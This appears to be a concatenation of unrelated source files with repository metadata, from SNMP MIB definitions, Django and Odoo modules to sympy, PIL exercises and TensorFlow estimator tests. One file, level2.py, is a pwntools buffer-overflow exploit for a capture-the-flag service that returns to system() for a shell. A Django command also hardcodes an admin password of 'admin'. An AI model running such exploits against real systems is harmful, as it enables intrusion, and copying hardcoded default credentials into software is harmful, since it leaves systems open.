dfltCnfgExists = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 3, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: dfltCnfgExists.setStatus('current')
backupConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 4))
backupCnfgPath = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 4, 1), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: backupCnfgPath.setStatus('current')
backupCnfgExists = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 4, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: backupCnfgExists.setStatus('current')
backupCnfgSetStatus = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 4, 3), SystemFileOperationType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: backupCnfgSetStatus.setStatus('current')
backupCnfgLastSetResult = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 3, 4, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: backupCnfgLastSetResult.setStatus('current')
serviceConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 5))
srvcTelnetEnable = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 5, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: srvcTelnetEnable.setStatus('current')
srvcSshEnable = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 5, 2), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: srvcSshEnable.setStatus('current')
guiConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 6))
guiAppletConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 6, 1))
guiAppletSysSwVer = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 6, 1, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: guiAppletSysSwVer.setStatus('current')
guiAppletSwVer = MibScalar((1, 3, 6, 1, 4, 1, 207, 8, 4, 4, 4, 500, 6, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: guiAppletSwVer.setStatus('current')
mibBuilder.exportSymbols("AT-SETUP-MIB", restartDevice=restartDevice, currSoftSaveStatus=currSoftSaveStatus, dfltCnfgPath=dfltCnfgPath, restartStkMemberDevice=restartStkMemberDevice, bootCnfgSetStatus=bootCnfgSetStatus, backupPath=backupPath, PYSNMP_MODULE_ID=setup, firmware=firmware, deviceConfiguration=deviceConfiguration, guiAppletConfig=guiAppletConfig, currSoftName=currSoftName, guiConfig=guiConfig, bootCnfgExists=bootCnfgExists, backupCnfgSetStatus=backupCnfgSetStatus, bootCnfgPath=bootCnfgPath, backupLastSetResult=backupLastSetResult, backupCnfgPath=backupCnfgPath, runningConfig=runningConfig, nextBootVersion=nextBootVersion, currSoftSaveAs=currSoftSaveAs, runCnfgSaveAsStatus=runCnfgSaveAsStatus, backupConfig=backupConfig, serviceConfig=serviceConfig, setup=setup, backupCnfgLastSetResult=backupCnfgLastSetResult, dfltCnfgExists=dfltCnfgExists, guiAppletSwVer=guiAppletSwVer, backupVersion=backupVersion, guiAppletSysSwVer=guiAppletSysSwVer, defaultConfig=defaultConfig, runCnfgSaveAs=runCnfgSaveAs, runCnfgLastSaveResult=runCnfgLastSaveResult, srvcSshEnable=srvcSshEnable, nextBootSetStatus=nextBootSetStatus, srvcTelnetEnable=srvcTelnetEnable, nextBootFirmware=nextBootFirmware, nextBootPath=nextBootPath, currentFirmware=currentFirmware, backupCnfgExists=backupCnfgExists, currSoftLastSaveResult=currSoftLastSaveResult, backupFirmware=backupFirmware, nextBootLastSetResult=nextBootLastSetResult, SystemFileOperationType=SystemFileOperationType, backupSetStatus=backupSetStatus, currSoftSaveToFile=currSoftSaveToFile, nextBootConfig=nextBootConfig, bootCnfgLastSetResult=bootCnfgLastSetResult, currSoftVersion=currSoftVersion)
| [
"[email protected]"
]
| |
ff09036b192720416dd122ea9562138c9f0394ce | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/2/gg_.py | 30cf80cef6a2d8b04f1644345692606c1376e383 | []
| no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'gg_':
printFunction(data[1:])
else:
print 'ERROR'
return
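# Example "program" this interpreter accepts (assumed from the parsing above: tokens are
# space-separated, and the text is delimited by standalone quote tokens):
#   gg_ " Howdy from gg_ "
# prints: Howdy from gg_
# Any line whose first token is not gg_ makes main() print ERROR and stop.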
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
]
| |
606d8cfb72f406daa19f033514b6c0387ef8ccc6 | 4542db1d4955aaf7c53c9ff7282d064a066ff393 | /2020/December/20-Dec/command line argument,exception handling.py | 763d53a7e21443113b29d545b869e123aa5501e4 | []
| no_license | mohanbabu2706/100 | 7227527b0e0af1e4f69d194b7537c7aef27a810d | 3c5a8b769fd4205afb3e3fd7e9cbf2ebf053b7b9 | refs/heads/master | 2023-02-20T09:56:45.970290 | 2021-01-20T10:09:09 | 2021-01-20T10:09:09 | 297,233,598 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | #This program adds up integers that have been passed as arguments in the command line
import sys
try:
    total = sum(int(arg) for arg in sys.argv[1:])
    print('sum = ', total)
except ValueError:
    print('Please supply integer arguments')
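# Example (quoting the script name because it contains spaces):
#   python "command line argument,exception handling.py" 3 4 5   -> prints the total
#   python "command line argument,exception handling.py" 3 four  -> hits the ValueError branch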
| [
"[email protected]"
]
| |
4152263ec153a74dbe4b9a6e39b6c9bc8a66e341 | 9307c025d1611a9fd21b34543643a46a03a3d3a4 | /orcamentos/core/management/commands/create_admin.py | 220674e01324f0d30c05556b6c13f8580aa167ad | [
"MIT"
]
| permissive | projetosparalelos/orcamentos | 74892ae46bfd86a4e8196fa3feb15cb55692ef03 | af88f5a2b5d73f7ea6cf416d871714a0ebcdf252 | refs/heads/master | 2020-04-27T12:41:59.811244 | 2019-01-17T04:31:28 | 2019-01-17T04:31:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 886 | py | from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from orcamentos.crm.models import Employee
class Command(BaseCommand):
    help = ''' Create an admin user. '''
def handle(self, *args, **kwargs):
'''
        Create an Employee.
        We need an Employee to perform every transaction in the system.
'''
username = 'admin'
first_name = 'Admin'
last_name = 'Admin'
email = '[email protected]'
user = Employee.objects.create(
username=username,
first_name=first_name,
last_name=last_name,
email=email,
gender='I'
)
user.set_password('admin')
user.is_staff = True
user.is_superuser = True
user.is_active = True
user.save()
print('Usuário criado com sucesso.')
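        # Usage note: since this file lives under core/management/commands/, the command is
        # invoked as `python manage.py create_admin`; it always creates the same fixed user.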
| [
"[email protected]"
]
| |
7d366690a2e18aece41ce666bb4da73a35298049 | 93713f46f16f1e29b725f263da164fed24ebf8a8 | /Library/lib/python3.7/site-packages/sympy/stats/stochastic_process.py | ad68ef5ac3b84750463e3b0a29e5a5de45eaf751 | [
"BSD-3-Clause"
]
| permissive | holzschu/Carnets | b83d15136d25db640cea023abb5c280b26a9620e | 1ad7ec05fb1e3676ac879585296c513c3ee50ef9 | refs/heads/master | 2023-02-20T12:05:14.980685 | 2023-02-13T15:59:23 | 2023-02-13T15:59:23 | 167,671,526 | 541 | 36 | BSD-3-Clause | 2022-11-29T03:08:22 | 2019-01-26T09:26:46 | Python | UTF-8 | Python | false | false | 2,228 | py | from __future__ import print_function, division
from sympy import Basic
from sympy.stats.joint_rv import ProductPSpace
from sympy.stats.rv import ProductDomain, _symbol_converter
class StochasticPSpace(ProductPSpace):
"""
Represents probability space of stochastic processes
and their random variables. Contains mechanics to do
computations for queries of stochastic processes.
Initialized by symbol, the specific process and
distribution(optional) if the random indexed symbols
of the process follows any specific distribution, like,
in Bernoulli Process, each random indexed symbol follows
Bernoulli distribution. For processes with memory, this
parameter should not be passed.
"""
def __new__(cls, sym, process, distribution=None):
sym = _symbol_converter(sym)
from sympy.stats.stochastic_process_types import StochasticProcess
if not isinstance(process, StochasticProcess):
raise TypeError("`process` must be an instance of StochasticProcess.")
return Basic.__new__(cls, sym, process, distribution)
@property
def process(self):
"""
The associated stochastic process.
"""
return self.args[1]
@property
def domain(self):
return ProductDomain(self.process.index_set,
self.process.state_space)
@property
def symbol(self):
return self.args[0]
@property
def distribution(self):
return self.args[2]
def probability(self, condition, given_condition=None, evaluate=True, **kwargs):
"""
Transfers the task of handling queries to the specific stochastic
process because every process has their own logic of handling such
queries.
"""
return self.process.probability(condition, given_condition, evaluate, **kwargs)
def compute_expectation(self, expr, condition=None, evaluate=True, **kwargs):
"""
Transfers the task of handling queries to the specific stochastic
process because every process has their own logic of handling such
queries.
"""
return self.process.expectation(expr, condition, evaluate, **kwargs)
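    # Example of how this pspace is exercised (sketch; assumes BernoulliProcess is
    # available in this sympy version). P/E queries on random indexed symbols are
    # ultimately routed through probability()/compute_expectation() above:
    #   from sympy import Rational, Eq
    #   from sympy.stats import BernoulliProcess, P, E
    #   B = BernoulliProcess("B", p=Rational(3, 4), succ=1, fail=0)
    #   P(Eq(B[1], 1))   # 3/4
    #   E(B[2])          # 3/4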
| [
"[email protected]"
]
| |
054d37c07f6a302bf45d9cc67212e2cd1df7291a | 60a831fb3c92a9d2a2b52ff7f5a0f665d4692a24 | /IronPythonStubs/release/stubs.min/Autodesk/Revit/DB/Structure/__init___parts/DistributionType.py | d38e3a744760d77f5c4751c442f58658e92cb577 | [
"MIT"
]
| permissive | shnlmn/Rhino-Grasshopper-Scripts | a9411098c5d1bbc55feb782def565d535b27b709 | 0e43c3c1d09fb12cdbd86a3c4e2ba49982e0f823 | refs/heads/master | 2020-04-10T18:59:43.518140 | 2020-04-08T02:49:07 | 2020-04-08T02:49:07 | 161,219,695 | 11 | 2 | null | null | null | null | UTF-8 | Python | false | false | 912 | py | class DistributionType(Enum,IComparable,IFormattable,IConvertible):
"""
The type of the distribution
enum DistributionType,values: Uniform (0),VaryingLength (1)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Uniform=None
value__=None
VaryingLength=None
| [
"[email protected]"
]
| |
5c43f2e8a875e9f1939b98e2c16527d7a369d9b7 | 7e40c8bb28c2cee8e023751557b90ef7ef518326 | /level2/level2.py | 6b6d4cb94b858331308d54c42e681b7377f549a3 | []
| no_license | 1337536723/buuctf_pwn | b6e5d65372ed0638a722faef1775026a89321fa3 | cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf | refs/heads/master | 2023-08-29T19:35:04.352530 | 2021-11-16T14:06:20 | 2021-11-16T14:06:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | from pwn import *
bin_addr = 0x0804a024
#p = process('./level2')
p = remote('node3.buuoj.cn', 26359)
elf = ELF('level2')
sys_addr = elf.plt['system']
p.recvuntil('Input:')
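# Payload layout (classic 32-bit ret2plt; the constants are assumptions about this binary):
# 0x88 bytes of buffer plus 4 bytes of saved EBP as padding, then system@plt as the
# overwritten return address, a dummy return address for system, and bin_addr as its
# argument (assumed to point at a "/bin/sh" string inside the binary).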
payload = b'a' * ( 0x88 + 4 ) + p32(sys_addr) + p32(0x123) + p32(bin_addr)
p.sendline(payload)
p.interactive()
| [
"[email protected]"
]
| |
c85b43f04745e322592dcd18a3f52120461d5379 | 95a534d8e0a3d29ae5224e7135f1961a14f2674d | /app/one_to_one/models.py | 45135b5ad8e389f9ac61ad03a44a9a63a3899105 | []
| no_license | mongkyo/prac-document | 7a96bfed1d62411dcf231376898f73b94bdb969f | 65a5331130feb3a0e135255c82ea8d2ba23d4ecc | refs/heads/master | 2020-03-31T08:06:43.134379 | 2018-10-11T17:40:42 | 2018-10-11T17:40:42 | 152,046,166 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 878 | py | from django.db import models
class Place(models.Model):
name = models.CharField(max_length=50)
address = models.CharField(max_length=80)
def __str__(self):
return f'{self.name} the place'
class Restaurant(models.Model):
place = models.OneToOneField(
Place,
on_delete=models.CASCADE,
primary_key=True,
)
serves_hot_dogs = models.BooleanField(default=False)
serves_pizza = models.BooleanField(default=False)
def __str__(self):
return f'{self.place.name} the restaurant'
class Waiter(models.Model):
restaurant = models.ForeignKey(
Restaurant,
on_delete=models.CASCADE,
)
name = models.CharField(max_length=50)
def __str__(self):
        return '{name} the waiter at {restaurant}'.format(
            name=self.name,
            restaurant=self.restaurant,
        )
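# Usage sketch (Django shell, assuming migrations for this app have been applied):
#   p = Place.objects.create(name="Demon Dogs", address="944 W. Fulton")
#   r = Restaurant.objects.create(place=p, serves_hot_dogs=True, serves_pizza=False)
#   p.restaurant                      # reverse one-to-one access returns r
#   Waiter.objects.create(restaurant=r, name="Joe")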
| [
"[email protected]"
]
| |
64e08a3ae92f72b778581622471ad547fefae6dd | b284097fb7eda14307defe2dd19fe290a366a8b3 | /addons-vauxoo/invoice_cancel_iva/model/invoice.py | b868901d2963f3be0082d600541caff1c9bfe1db | []
| no_license | OpenBusinessSolutions/odoo-fondeur-server | 41420069e77b2faaf12c396e5d3d2a2c165a8ae2 | 9c588e45011a87ec8d9af73535c4c56485be92f7 | refs/heads/master | 2021-01-01T05:45:29.736682 | 2016-04-19T15:21:58 | 2016-04-19T15:21:58 | 56,607,743 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,060 | py | # coding: utf-8
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://openerp.com.ve>).
# All Rights Reserved
# Credits######################################################
# Coded by: Vauxoo C.A.
# Planified by: Nhomar Hernandez
# Audited by: Vauxoo C.A.
#############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from openerp.osv import osv
from openerp.tools.translate import _
import openerp.workflow as workflow
class AccountInvoice(osv.Model):
_inherit = 'account.invoice'
#~ def action_cancel_draft(self, cr, uid, ids, *args):
#~
#~ wf_service = workflow
#~ res = super(account_invoice, self).action_cancel_draft(cr, uid, ids, ())
#~ for i in self.browse(cr,uid,ids,context={}):
#~ if i.wh_iva_id:
#~ wf_service.trg_validate(uid, 'account.wh.iva',i.wh_iva_id.id, 'set_to_draft', cr)
#~ return res
def action_number(self, cr, uid, ids, context=None):
'''
        Modified to validate the VAT withholding.
'''
wf_service = workflow
res = super(AccountInvoice, self).action_number(cr, uid, ids)
iva_line_obj = self.pool.get('account.wh.iva.line')
invo_brw = self.browse(cr, uid, ids, context=context)[0]
state = [('draft', 'set_to_draft'), (
'confirmed', 'wh_iva_confirmed'), ('done', 'wh_iva_done')]
if invo_brw.cancel_true:
if invo_brw.wh_iva_id:
iva_line_obj.load_taxes(cr, uid, [
i.id for i in invo_brw.wh_iva_id.wh_lines],
context=context)
for d in state:
if invo_brw.wh_iva_id.prev_state == 'cancel':
break
if not all([False for line in invo_brw.wh_iva_id.wh_lines
if not line.invoice_id.move_id]):
raise osv.except_osv(_('Error'), _(
'One of the bills involved in the vat retention\
has not been validated, because it does not\
have an associated retention'))
wf_service.trg_validate(
uid, 'account.wh.iva', invo_brw.wh_iva_id.id, d[1], cr)
if d[0] == invo_brw.wh_iva_id.prev_state:
break
return res
def invoice_cancel(self, cr, uid, ids, context=None):
if context is None:
context = {}
context.update({'iva': True})
iva_obj = self.pool.get('account.wh.iva')
invo_brw = self.browse(cr, uid, ids, context=context)[0]
if invo_brw.wh_iva_id:
iva_obj.write(cr, uid, [invo_brw.wh_iva_id.id], {
'prev_state': invo_brw.wh_iva_id.state},
context=context)
res = super(AccountInvoice, self).invoice_cancel(
cr, uid, ids, context=context)
return res
def check_iva(self, cr, uid, ids, context=None):
if context is None:
context = {}
invo_brw = self.browse(cr, uid, ids[0], context=context)
if invo_brw.wh_iva_id:
return False
return True
| [
"[email protected]"
]
| |
27dcc1afb9eef48f0b54eae6b5613fe0829275e1 | c3e10c7174f78a8ac2dc0823a1fcfa4c80afc67b | /1elinearsearch.py | 2cca16f64fbbb233b2f111ac68456068d9554835 | []
| no_license | PreritBhandari/python-programs-III | 3460c63e56ce6383d71ec594274c4b3edf984117 | eea3fbecae59b410971e11ff3a50504752cb60da | refs/heads/master | 2022-11-19T09:20:11.332556 | 2020-07-19T03:56:44 | 2020-07-19T03:56:44 | 280,787,593 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | py | # e) linear search
def LinearSearch(lys, element):
for i in range(len(lys)):
if lys[i] == element:
return i
return False
if __name__ == "__main__":
print(LinearSearch([1, 2, 3, 4, 5, 2, 1], 2))
| [
"[email protected]"
]
| |
42394a236222b49e0c60dc927584f9b29b99139a | f68d246ea82f980706bfa574da91d99797c29b38 | /activeCode/heap.py | 4d0a8944d04ab21537ff135bbd68862108086e79 | []
| no_license | nicolas4d/Problem-Solving-with-Algorithms-and-Data-Structures-using-Python | 40684370ab0c8a22894aa58c0479da6697ea0a13 | 5c7595cab3c5501e4b4177b700708a2609c74e30 | refs/heads/master | 2020-12-02T13:43:49.547926 | 2020-02-01T14:19:08 | 2020-02-01T14:19:08 | 231,025,645 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | from pythonds.trees import BinHeap
bh = BinHeap()
bh.insert(5)
bh.insert(7)
bh.insert(3)
bh.insert(11)
print(bh.delMin())
print(bh.delMin())
print(bh.delMin())
print(bh.delMin())
| [
"[email protected]"
]
| |
066227fc4417ba0fff2fa3345443eb2815dab4c4 | b23d294fdffabe72c336644f119860f5ce704eef | /python_1000phone/预科/day2-PIL/04-文字和颜色块.py | fa76439697eb6e145f5254e5ba57f3ea695b190c | []
| no_license | ikaros274556330/my_code | 65232758fd20820e9f4fa8cb5a6c91a1969862a2 | 92db21c4abcbd88b7bd77e78d9f660b4534b5071 | refs/heads/master | 2020-11-26T09:43:58.200990 | 2019-12-23T02:08:39 | 2019-12-23T02:08:39 | 229,032,315 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | """__author:吴佩隆"""
from PIL import Image,ImageFont,ImageDraw
# 1. Text watermark - render text onto an image
# Prepare the image
image1 = Image.open('./files/chiling.jpg')
# Prepare the text
# 1) Create a font object
# ImageFont.truetype(path to the font file, font size)
font1 = ImageFont.truetype('files/bb.ttf',80)
# 2) Create a draw object
# draw = ImageDraw.Draw(image1)
draw = ImageDraw.Draw(image1)
# 3) Write the text
# draw.text(text position, content, (color), font object)
draw.text((0,0),'Hello Word!',(0,0,0),font1)
image1.show()
# 2. Color block
image2 = Image.new('RGB',(200,50),(255,255,255))
# 1) Create a draw object
draw2 = ImageDraw.Draw(image2)
# 2) Set the pixel at the given position of the image to the given color
# draw2.point(position, color)
draw2.point((0,0),(255,0,0))
image2.show()
| [
"[email protected]"
]
| |
524ed7e94503183a799d610122964444c9b38b8e | 304033f60097c489cbc60aab639be45ccdbef1a5 | /algorithms/inflearn/section2/7.py | 6e47b9bfce07d3c94cfb462166a5a879c41312ce | []
| no_license | pgw928/TIL | 3d0c47c07bd1f5c73826daf8579a2b0e3f93cb95 | 765906f1e6eecad4ad8ec9bf704041433d7eb304 | refs/heads/master | 2023-06-29T05:46:30.039815 | 2021-08-10T17:38:11 | 2021-08-10T17:38:11 | 288,923,095 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | import sys
sys.stdin = open('section2/input.txt', 'rt')
n = int(input())
nums = [True]*(n+1)                      # sieve of Eratosthenes: start by assuming every number is prime
nums[0], nums[1] = False, False          # 0 and 1 are not prime
for i in range(2, n//2+1):
    for j in range(2*i, n+1, i):         # cross out every proper multiple of i
        nums[j] = False
print(sum(nums)) | [
"[email protected]"
]
| |
2ac8ca7010ab02f782764f9cacfde68898b0dc49 | 10e94d77e56d9cbb979174795c465b679d03d6b3 | /tensorflow/contrib/learn/python/learn/estimators/estimator_test.py | 0acdbf20c3edc80fb0a163d9f7314403fed1882c | [
"Apache-2.0"
]
| permissive | pint1022/tf-coriander | 68939732c1ec0f052929c13ef6d8f49e44d423e4 | 197a685accca4a3f38285d6ac3ccf3998a200090 | refs/heads/master | 2020-04-14T18:56:40.334257 | 2019-01-11T00:40:11 | 2019-01-11T00:40:11 | 164,038,861 | 1 | 0 | Apache-2.0 | 2019-01-04T00:53:40 | 2019-01-04T00:53:40 | null | UTF-8 | Python | false | false | 22,385 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import tempfile
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.estimators import _sklearn
from tensorflow.contrib.learn.python.learn.estimators import estimator
_BOSTON_INPUT_DIM = 13
_IRIS_INPUT_DIM = 4
def boston_input_fn(num_epochs=None):
boston = tf.contrib.learn.datasets.load_boston()
features = tf.reshape(tf.constant(boston.data), [-1, _BOSTON_INPUT_DIM])
if num_epochs:
features = tf.train.limit_epochs(features, num_epochs=num_epochs)
target = tf.reshape(tf.constant(boston.target), [-1, 1])
return features, target
def iris_input_fn():
iris = tf.contrib.learn.datasets.load_iris()
features = tf.reshape(tf.constant(iris.data), [-1, _IRIS_INPUT_DIM])
target = tf.reshape(tf.constant(iris.target), [-1])
return features, target
def boston_eval_fn():
boston = tf.contrib.learn.datasets.load_boston()
n_examples = len(boston.target)
features = tf.reshape(
tf.constant(boston.data), [n_examples, _BOSTON_INPUT_DIM])
target = tf.reshape(tf.constant(boston.target), [n_examples, 1])
return tf.concat(0, [features, features]), tf.concat(0, [target, target])
def linear_model_params_fn(features, target, mode, params):
assert mode in ('train', 'eval', 'infer')
prediction, loss = (
tf.contrib.learn.models.linear_regression_zero_init(features, target)
)
train_op = tf.contrib.layers.optimize_loss(
loss, tf.contrib.framework.get_global_step(), optimizer='Adagrad',
learning_rate=params['learning_rate'])
return prediction, loss, train_op
def linear_model_fn(features, target, mode):
assert mode in ('train', 'eval', 'infer')
prediction, loss = (
tf.contrib.learn.models.linear_regression_zero_init(features, target)
)
train_op = tf.contrib.layers.optimize_loss(
loss, tf.contrib.framework.get_global_step(), optimizer='Adagrad',
learning_rate=0.1)
return prediction, loss, train_op
def logistic_model_no_mode_fn(features, target):
target = tf.one_hot(target, 3, 1, 0)
prediction, loss = (
tf.contrib.learn.models.logistic_regression_zero_init(features, target)
)
train_op = tf.contrib.layers.optimize_loss(
loss, tf.contrib.framework.get_global_step(), optimizer='Adagrad',
learning_rate=0.1)
return {'class': tf.argmax(prediction, 1), 'prob': prediction}, loss, train_op
class CheckCallsMonitor(tf.contrib.learn.monitors.BaseMonitor):
def __init__(self, expect_calls):
super(CheckCallsMonitor, self).__init__()
self.begin_calls = None
self.end_calls = None
self.expect_calls = expect_calls
def begin(self, max_steps):
self.begin_calls = 0
self.end_calls = 0
def step_begin(self, step):
self.begin_calls += 1
return {}
def step_end(self, step, outputs):
self.end_calls += 1
return False
def end(self):
assert (self.end_calls == self.expect_calls and
self.begin_calls == self.expect_calls)
class EstimatorTest(tf.test.TestCase):
def testCustomConfig(self):
test_random_seed = 5783452
class TestInput(object):
def __init__(self):
self.random_seed = 0
def config_test_input_fn(self):
self.random_seed = tf.get_default_graph().seed
return tf.constant([[1.]]), tf.constant([1.])
config = tf.contrib.learn.RunConfig(tf_random_seed=test_random_seed)
test_input = TestInput()
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn, config=config)
est.fit(input_fn=test_input.config_test_input_fn, steps=1)
# If input_fn ran, it will have given us the random seed set on the graph.
self.assertEquals(test_random_seed, test_input.random_seed)
def testCheckInputs(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
# Lambdas so we have to different objects to compare
right_features = lambda: np.ones(shape=[7, 8], dtype=np.float32)
right_targets = lambda: np.ones(shape=[7, 10], dtype=np.int32)
est.fit(right_features(), right_targets(), steps=1)
# TODO(wicke): This does not fail for np.int32 because of data_feeder magic.
wrong_type_features = np.ones(shape=[7., 8.], dtype=np.int64)
wrong_size_features = np.ones(shape=[7, 10])
wrong_type_targets = np.ones(shape=[7., 10.], dtype=np.float32)
wrong_size_targets = np.ones(shape=[7, 11])
est.fit(x=right_features(), y=right_targets(), steps=1)
with self.assertRaises(ValueError):
est.fit(x=wrong_type_features, y=right_targets(), steps=1)
with self.assertRaises(ValueError):
est.fit(x=wrong_size_features, y=right_targets(), steps=1)
with self.assertRaises(ValueError):
est.fit(x=right_features(), y=wrong_type_targets, steps=1)
with self.assertRaises(ValueError):
est.fit(x=right_features(), y=wrong_size_targets, steps=1)
def testBadInput(self):
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
self.assertRaisesRegexp(ValueError,
'Either x or input_fn must be provided.',
est.fit, x=None, input_fn=None)
self.assertRaisesRegexp(ValueError,
'Can not provide both input_fn and x or y',
est.fit, x='X', input_fn=iris_input_fn)
self.assertRaisesRegexp(ValueError,
'Can not provide both input_fn and x or y',
est.fit, y='Y', input_fn=iris_input_fn)
self.assertRaisesRegexp(ValueError,
'Can not provide both input_fn and batch_size',
est.fit, input_fn=iris_input_fn, batch_size=100)
self.assertRaisesRegexp(
ValueError, 'Inputs cannot be tensors. Please provide input_fn.',
est.fit, x=tf.constant(1.))
def testUntrained(self):
boston = tf.contrib.learn.datasets.load_boston()
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
with self.assertRaises(tf.contrib.learn.NotFittedError):
_ = est.evaluate(
x=boston.data,
y=boston.target.astype(np.float64))
with self.assertRaises(tf.contrib.learn.NotFittedError):
est.predict(x=boston.data)
def testContinueTraining(self):
boston = tf.contrib.learn.datasets.load_boston()
output_dir = tempfile.mkdtemp()
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn,
model_dir=output_dir)
float64_target = boston.target.astype(np.float64)
est.fit(x=boston.data, y=float64_target, steps=50)
scores = est.evaluate(
x=boston.data,
y=float64_target,
metrics={'MSE': tf.contrib.metrics.streaming_mean_squared_error})
del est
# Create another estimator object with the same output dir.
est2 = tf.contrib.learn.Estimator(model_fn=linear_model_fn,
model_dir=output_dir)
# Check we can evaluate and predict.
scores2 = est2.evaluate(
x=boston.data,
y=float64_target,
metrics={'MSE': tf.contrib.metrics.streaming_mean_squared_error})
self.assertAllClose(scores2['MSE'],
scores['MSE'])
predictions = est2.predict(x=boston.data)
other_score = _sklearn.mean_squared_error(predictions, float64_target)
self.assertAllClose(other_score, scores['MSE'])
# Check we can keep training.
est2.fit(x=boston.data, y=float64_target, steps=100)
scores3 = est2.evaluate(
x=boston.data,
y=float64_target,
metrics={'MSE': tf.contrib.metrics.streaming_mean_squared_error})
self.assertLess(scores3['MSE'], scores['MSE'])
def testEstimatorParams(self):
boston = tf.contrib.learn.datasets.load_boston()
est = tf.contrib.learn.Estimator(model_fn=linear_model_params_fn,
params={'learning_rate': 0.01})
est.fit(x=boston.data, y=boston.target, steps=100)
def testBostonAll(self):
boston = tf.contrib.learn.datasets.load_boston()
est = tf.contrib.learn.Estimator(model_fn=linear_model_fn)
float64_target = boston.target.astype(np.float64)
est.fit(x=boston.data, y=float64_target, steps=100)
scores = est.evaluate(
x=boston.data,
y=float64_target,
metrics={'MSE': tf.contrib.metrics.streaming_mean_squared_error})
predictions = est.predict(x=boston.data)
other_score = _sklearn.mean_squared_error(predictions, boston.target)
self.assertAllClose(other_score, scores['MSE'])
self.assertTrue('global_step' in scores)
self.assertEqual(scores['global_step'], 100)
def testIrisAll(self):
iris = tf.contrib.learn.datasets.load_iris()
